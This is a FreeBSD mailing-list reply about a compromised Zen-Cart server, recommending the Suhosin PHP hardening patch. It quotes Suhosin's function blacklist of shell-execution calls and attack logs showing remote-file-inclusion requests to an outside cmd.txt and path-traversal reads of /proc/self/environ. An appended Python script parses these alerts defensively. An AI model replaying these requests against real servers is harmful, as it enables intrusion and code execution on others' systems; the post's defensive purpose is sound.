From owner-freebsd-questions@FreeBSD.ORG Mon Feb 1 17:19:50 2010
Return-Path:
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D40B51065670 for ; Mon, 1 Feb 2010 17:19:50 +0000 (UTC) (envelope-from bogdan@pgn.ro)
Received: from mail-bw0-f213.google.com (mail-bw0-f213.google.com [209.85.218.213]) by mx1.freebsd.org (Postfix) with ESMTP id 5929F8FC0C for ; Mon, 1 Feb 2010 17:19:49 +0000 (UTC)
Received: by bwz5 with SMTP id 5so1558059bwz.3 for ; Mon, 01 Feb 2010 09:19:49 -0800 (PST)
MIME-Version: 1.0
Received: by 10.204.9.151 with SMTP id l23mr871213bkl.76.1265044786566; Mon, 01 Feb 2010 09:19:46 -0800 (PST)
In-Reply-To:
References:
Date: Mon, 1 Feb 2010 19:19:46 +0200
Message-ID:
From: Bogdan Webb
To: freebsd-questions@freebsd.org
Content-Type: text/plain; charset=ISO-8859-1
X-Content-Filtered-By: Mailman/MimeDel 2.1.5
Subject: Re: Server compromised Zen-Cart "record company" Exploit
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: User questions
List-Unsubscribe: ,
List-Archive:
List-Post:
List-Help:
List-Subscribe: ,
X-List-Received-Date: Mon, 01 Feb 2010 17:19:50 -0000

Indeed it's pretty tricky with safe_mode. Like, for certain I know that a version of a popular r57 shell had a safe_mode bypass - I was stunned to check the shell myself on my server... and I was thinking that safe_mode is enough... (+ I was using the Suhosin patch, which in fact does nothing regarding straightening the PHP.) Then I came over Suhosin the addon (which on my BSD with lighttpd could be loaded only using the Zen framework, for reasons unknown to me). The Suhosin was configured to blacklist some basic commands that allow PHP to directly run shell commands:

suhosin.executor.func.blacklist = "proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec"

Thus even if hackers find bugs in some PHP apps it would be harder to get a shell... I say harder because it's impossible to prevent that - there are MySQL ways to get a shell and so on... so it's not 100% foolproof. Here are some examples of how Suhosin alerts on the attacks:

Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home/wwww/pgnlinks/index.php')
Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home/wwww/pvpwww/junkforum/Sources/Subs.php', line 3531)

*note - these are logs from /var/log/messages and the last message is a false positive (I think it's called that way): it's a basic function of the SMF board to check the DNS with a Linux command, but I just wanted to point out how it handles the blacklist...

Here's some more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd):

2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')
2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 200 3304 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] "GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3306 "-" "Mozilla/3.0 (compatible; Indy Library)"

My server has safe_mode off - because it's not needed (at least in my mind... I might be mistaken). And check out the phpinfo.php file I've got and see the Suhosin settings....

stay safe!
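As an added example (not from the post above and not part of Suhosin), a small Python parser for the Suhosin ALERT lines the post quotes, in both the syslog (/var/log/messages) and lighttpd FastCGI-stderr forms, that pulls out the attacker IP, file and line and tallies alert kinds per IP so the blacklist hit from the SMF board can be told apart from the NUL-byte and forbidden-variable attempts; the sample lines are constructed after the ones in the post, and the classify() categories are my own names.

```python
import re
from collections import Counter

# Constructed sample log, modelled on the lines quoted in the post: two
# syslog-style Suhosin alerts, two lighttpd mod_fastcgi stderr alerts and
# one unrelated sshd line that the parser must ignore.
SAMPLE_LOG = """\
Jan  2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home/wwww/pgnlinks/index.php')
Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home/wwww/pvpwww/junkforum/Sources/Subs.php', line 3531)
2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')
2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')
Jan  2 02:18:00 pgn sshd[1234]: Accepted publickey for admin from 10.0.0.5
"""

# The ALERT suffix has the same shape whichever log transport carried it:
#   ALERT - <message> (attacker '<ip>', file '<path>'[, line <n>])
ALERT_RE = re.compile(
    r"ALERT - (?P<message>.+?) "
    r"\(attacker '(?P<attacker>[^']+)', file '(?P<file>[^']+)'"
    r"(?:, line (?P<line>\d+))?\)\s*$"
)

def classify(message):
    """Map a Suhosin alert message to a coarse category (names are mine)."""
    if message.startswith("function within blacklist called"):
        return "blacklist"           # a blacklisted function was reached from PHP code
    if message.startswith("tried to register forbidden variable"):
        return "forbidden_variable"  # request tried to inject e.g. _SERVER[...]
    if "ASCII-NUL" in message:
        return "nul_byte"            # %00 in a request variable, dropped by Suhosin
    return "other"

def parse_alert(line):
    """Return a dict for a Suhosin ALERT line, or None for any other line."""
    m = ALERT_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["line"] = int(rec["line"]) if rec["line"] else None
    rec["kind"] = classify(rec["message"])
    return rec

def summarize(log_text):
    """Count alert kinds per attacker IP over a whole log."""
    per_attacker = {}
    for line in log_text.splitlines():
        rec = parse_alert(line)
        if rec is not None:
            per_attacker.setdefault(rec["attacker"], Counter())[rec["kind"]] += 1
    return per_attacker
```

Run summarize() over the real /var/log/messages and lighttpd error log to see which source IPs keep tripping the NUL-byte and forbidden-variable checks; a single blacklist hit from a known application file (like the SMF Subs.php call) is the false positive the post describes.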